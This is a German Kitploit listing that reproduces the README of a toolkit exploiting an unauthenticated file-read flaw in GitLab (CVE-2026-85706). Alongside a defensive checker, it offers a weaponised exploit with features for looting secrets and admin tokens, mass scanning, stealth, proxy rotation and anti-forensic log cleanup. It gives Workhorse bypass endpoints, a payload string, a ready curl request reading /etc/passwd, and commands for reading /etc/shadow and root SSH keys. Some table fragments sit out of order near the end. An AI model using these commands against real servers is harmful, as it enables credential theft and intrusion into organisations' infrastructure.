Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-85706-PoC-Toolkit — Python-Toolkit für CVE-2026-85706 GitLab unauth file read: weaponisierter Exploit mit Loot, Shell, Massenscan, plus nicht-intrusivem SafeChecker-Audit und Reporting. | Kitploit
Tools/GitHubGitHub/tc4dy/cve-2026-85706-poc-toolkit
DefensivwerkzeugeSchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPost-ExploitationWebsicherheitPenetrationstests

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Red Teaming
GitHubtc4dy/cve-2026-85706-poc-toolkit

CVE-2026-85706-PoC-Toolkit

Python-Toolkit für CVE-2026-85706 GitLab unauth file read: weaponisierter Exploit mit Loot, Shell, Massenscan, plus nicht-intrusivem SafeChecker-Audit und Reporting.

Repository anzeigenWebseite
1vor 10h 19mNoch nicht geprüft
Teilen

CVEPoC

CVE‑2026‑85706 – GitLab-Toolkit für nicht authentifiziertes Dateilesen

Python 3.8+ CVSS Author GitLab

⚠️ NUR ZUR ETHISCHEN VERWENDUNG – AUTORISIERTE SICHERHEITSTESTS
Dieses Repository stellt Tools ausschließlich für autorisierte Sicherheitsexperten, Blue Teams und Penetrationstester bereit.
Unbefugter Zugriff auf Computersysteme ist illegal gemäß CFAA (USA), Computer Misuse Act (UK), TCK 243/244 (Türkei) und ähnlichen Gesetzen weltweit.


📖 Schwachstellenübersicht

CVE‑2026‑85706 ist eine kritische nicht authentifizierte beliebige lokale Dateileseschwachstelle in selbstverwaltetem GitLab CE/EE (Versionen 18.7 bis 19.3.1), die es einem nicht authentifizierten Angreifer ermöglicht, jede Datei auf dem Server über eine einzige HTTP-Anfrage an die Commits-API zu lesen.

Funktionsweise

  1. Workhorse vs. Puma Parsing-Diskrepanz – GitLab Workhorse validiert den Anforderungspfad vor der Prozent-Dekodierung, während Puma/Rails ihn danach dekodiert. Dies ermöglicht die Umgehung der Sicherheitsprüfungen von Workhorse durch kodierte Zeichen wie %63ommits.
  2. Pre-Auth-Dateiöffnung – der Endpunkt /api/v4/projects/{id}/repository/commits öffnet die in file.path angegebene Datei bevor die Authentifizierung erzwungen wird.
  3. Inhaltsausgabe über Fehler – wenn die Datei eine ungültige %-Sequenz enthält, gibt Rack den Inhalt in einem 400 Bad Request-Body aus und gibt den vollständigen Inhalt preis.
  4. Auswirkung – Secrets, Tokens, SSH-Schlüssel, CI/CD-Variablen, Datenbank-Anmeldedaten und laterale Bewegung in die GitLab-Infrastruktur. Sofort aktualisieren!

Betroffene Versionen

  • 18.7.0 – 19.1.7 – anfällig
  • 19.2.0 – 19.2.5 – anfällig
  • 19.3.0 – 19.3.1 – anfällig

Patch

  • Aktualisieren Sie auf 19.1.8, 19.2.6 oder 19.3.2 oder neuer.
  • Wenn ein Upgrade nicht möglich ist, beschränken Sie den Netzwerkzugriff auf GitLab (setzen Sie es niemals dem Internet aus) und rotieren Sie alle Tokens/Secrets als vorübergehende Problemumgehung.

🧰 Tools

ToolZweckVorgesehener Benutzer
exploit.pyVollständiges weaponisiertes Toolkit mit nicht authentifiziertem Dateilesen, Loot-Enumeration, Admin-Token-Extraktion, Massenscanning, interaktiver Shell, Proxy-Rotation, Stealth-Modus und Berichten in mehreren Formaten.Red Teams / autorisierte Pentester
safechecker.pyNicht-intrusiver Schwachstellenprüfer, der die GitLab-Version erkennt, die Exposition validiert, Sicherheitsheader prüft und das Risiko bewertet, ohne eine Datei zu lesen. Erzeugt JSON/CSV/HTML-Berichte.Blue Teams / Sicherheitsauditoren

📊 Funktionsvergleich

Funktionexploit.pysafechecker.py
Schwachstellenerkennung✅✅
Versionserkennung✅✅
Nicht authentifiziertes Dateilesen✅❌
Loot-Enumeration✅❌
Admin-Token-Extraktion✅❌
Interaktive Shell✅❌
Massenscanning (Multi-Thread)✅✅
Audit der Sicherheitsheader❌✅
TLS-/Zertifikatsprüfung❌✅
MITRE ATT&CK-Zuordnung✅✅
Proxy-Unterstützung✅✅
Proxy-Rotation✅❌
User-Agent-Rotation (OPSEC)✅❌
Jitter / Verzögerung (OPSEC)✅❌
Adaptiver Rate-Limiter✅✅
Stealth-Modus✅❌
curl_cffi TLS-Impersonation✅❌
Nicht-intrusiver (sicherer) Modus❌✅
JSON / JSONL / CSV / HTML-Ausgabe✅✅
SQLite-DB-Ausgabe✅❌
Webhook-Benachrichtigung✅✅
Diff gegen vorherigen Scan✅✅
Log-Bereinigung (Anti-Forensik)

🎯 Zusammenfassung der Anwendungsfälle

SzenarioEmpfohlenes Tool
Blue Team – Überprüfung, ob Ihr GitLab anfällig istsafechecker.py
Sicherheitsaudit – nicht-intrusive Schwachstellenbewertungsafechecker.py
Red Team – autorisierte Penetrationstests mit vollständiger Ausnutzungexploit.py
Bug Bounty – Tests zur verantwortungsvollen Offenlegungsafechecker.py
Massenscanning – Überprüfung mehrerer Ziele auf Schwachstellenexploit.py (nur Erkennung)
Incident Response – Überprüfung, ob Systeme kompromittiert wurdensafechecker.py

⚙️ Installation

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-85706-PoC-Toolkit
cd CVE-2026-85706-PoC-Toolkit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
curl_cffi
rich
pyyaml

📋 Parameter

exploit.py Parameter

ParameterBeschreibung
-u, --urlEinzelne Ziel-URL (z. B. https://gitlab.example.com)
-f, --fileDatei mit Zielliste (eine pro Zeile)
--pipeZiele von stdin lesen (subfinder/httpx-Pipeline)
--readAbsolute(r) Pfad(e) zum Lesen, kommagetrennt
--wordlistDatei mit zu lesenden Pfaden (eine pro Zeile)
--project-idEine bestimmte Projekt-ID erzwingen
--max-projectsMaximale Anzahl zu testender Projekt-IDs (Standard: 8)
--autoHochwertige GitLab-Dateien automatisch erbeuten
--lootWie --auto
--shellInteraktive Shell nach der Ausnutzung
--forceScannen, auch wenn der GitLab-Fingerprint schwach ist
-t, --threadsThreads für mehrere Ziele (Standard: 8)
--timeoutHTTP-Timeout (Standard: 15s)
--retryAnzahl der Wiederholungsversuche (Standard: 3)
--retry-onHTTP-Codes für Wiederholung (Standard: 429,500,502,503,504)
--proxyHTTP/HTTPS-Proxy
--proxy-listDatei mit Proxys für Rotation
--proxy-rotateRotationsstrategie: round-robin, random, sticky
--jitterZufälligen Jitter zwischen Anfragen hinzufügen
--jitter-rangeJitter min,max Sekunden (Standard: 0.1,2.0)
--delayFeste Verzögerung zwischen Anfragen
--stealthStealth-Modus aktivieren (UA-Rotation + X-Forwarded-For)

safechecker.py Parameter

ParameterBeschreibung
-u, --urlEinzelne Ziel-URL (z. B. https://gitlab.example.com)
-f, --fileDatei mit Zielen (eine pro Zeile)
-t, --threadsThreads für mehrere Ziele (Standard: 5)
--timeoutHTTP-Timeout (Standard: 10s)
--rate-limitMaximale Anfragen pro Sekunde (0 = unbegrenzt)
--user-agentBenutzerdefinierter User-Agent-String
--insecureTLS-Verifikation deaktivieren (MITM-Risiko)
--webhookWebhook-URL (slack:, discord:, telegram:)
--diffMit vorherigem Scan-JSON vergleichen
-v, --verboseAusführliche Ausgabe
-o, --outputJSON-Ausgabedatei
--csvCSV-Ausgabedatei
--reportHTML-Berichtsdatei
--mitreMITRE ATT&CK-Zuordnung einbeziehen (Standard: an)

💥 Szenarien

#SzenarioBefehl
1Schnelle Schwachstellenprüfungpython safechecker.py -u https://gitlab.example.com
2Detailliertes Audit mit Berichtpython safechecker.py -u https://gitlab.example.com -o report.json --csv report.csv --report report.html -v
3Massen-Audit aus Dateipython safechecker.py -f targets.txt -t 10 --rate-limit 5
4Nur-Erkennungs-Exploitpython exploit.py -u https://gitlab.example.com --safe-mode
5Eine einzelne Datei lesenpython exploit.py -u https://gitlab.example.com --read /etc/passwd
6Mehrere Dateien lesenpython exploit.py -u https://gitlab.example.com --read /etc/passwd,/etc/shadow,/root/.ssh/id_rsa
7Automatisches Erbeuten hochwertiger Dateienpython exploit.py -u https://gitlab.example.com --auto
8Interaktive Shellpython exploit.py -u https://gitlab.example.com --shell
9Massen-Exploit mit Stealthpython exploit.py -f targets.txt -t 20 --stealth --jitter --auto -o hits.jsonl --output-format jsonl
10Pipeline von subfindersubfinder -d example.com -silent | httpx -silent -sc | python exploit.py --pipe --auto -o hits.jsonl
11Vollständiger Angriff mit SIEM-Ausgabepython exploit.py -u https://gitlab.example.com --auto --grep "password|secret|token" --mitre --json-schema -o siem.json
12Unterbrochenen Scan fortsetzenpython exploit.py -f targets.txt --auto --resume state.json
13Zwei Scans vergleichenpython safechecker.py -f targets.txt -o new.json --diff previous.json

🧪 Endpunkt- & Ausnutzungskette

Der Exploit verwendet die folgenden GitLab-Endpunkte und Umgehungstechniken:

SchrittMethodeEndpunktBeschreibung
1. UmgehungPOST/api/v4/projects/{id}/repository/%63ommitsKodiertes c umgeht Workhorse
2. UmgehungPOST/api/v4/projects/{id}/%72epository/commitsKodiertes r in repository
3. UmgehungPOST/api/v4/projects/{id}/repository/commits/Umgehung durch abschließenden Schrägstrich
4. UmgehungPOST/api/v4/projects/{id}/repository/commits.jsonUmgehung durch Grape-Format-Suffix
5. Files APIPOST/api/v4/projects/{id}/repository/files/xAlternativer Pfad

Payload-Format

root@kitploit:~
file=&file.path=/etc/passwd&file.size=1

Fertiges curl

root@kitploit:~
curl -sk -X POST "https://gitlab.example.com/api/v4/projects/1/repository/%63ommits?file=&file.path=/etc/passwd&file.size=1&Content-Type=application/x-www-form-urlencoded"

🛡️ Verantwortungsvolle Nutzung

  • Verwenden Sie diese Tools nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.
  • Unbefugter Zugriff ist illegal und unethisch.
  • Die Autoren sind nicht für jeglichen Missbrauch verantwortlich.
  • Befolgen Sie stets die Gesetze und Vorschriften Ihres Landes.

Diese Software wird nur für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.

Tool herunterladen
✅
❌
Benutzerdefinierter User-Agent✅✅
SSL-Verifikationssteuerung✅✅
--curl-cfficurl_cffi für TLS-Fingerprint-Impersonation verwenden
--user-agent-fileDatei mit User-Agent-Strings
--max-bodyMaximale Größe des Antwort-Bodys (0 = unbegrenzt)
--concurrent-per-hostMaximale gleichzeitige Anfragen pro Host
--rate-limitMaximale Anfragen pro Sekunde (0 = unbegrenzt)
--excludeKommagetrennte Hosts zum Ausschließen (Glob-Muster)
--grepNur Leaks anzeigen, die dem Regex entsprechen
--resumeAus State-Datei fortsetzen
--notifyBenachrichtigungs-URL (slack:, discord:, telegram:)
--dbErgebnisse in SQLite-Datenbank speichern
--output-formatAusgabeformat: json, jsonl, csv, html
-o, --outputAusgabedateipfad
-v, --verboseAusführliche Ausgabe
-q, --quietLeiser Modus
--no-colorFarben deaktivieren
--no-bannerKein Banner
--configYAML/JSON-Konfigurationsdatei
--dry-runPlan anzeigen, ohne Anfragen zu stellen
--safe-modeNur /etc/hostname lesen zur Überprüfung
--timeout-profileaggressive, normal, stealth
--mitreMITRE ATT&CK-Zuordnung einbeziehen
--fingerprintDetaillierter GitLab-Fingerprint
--cve-checkAuf verwandte CVEs prüfen
--json-schemaAusgabe mit JSON-Schema für SIEM
--progressFortschrittsbalken anzeigen (erfordert rich)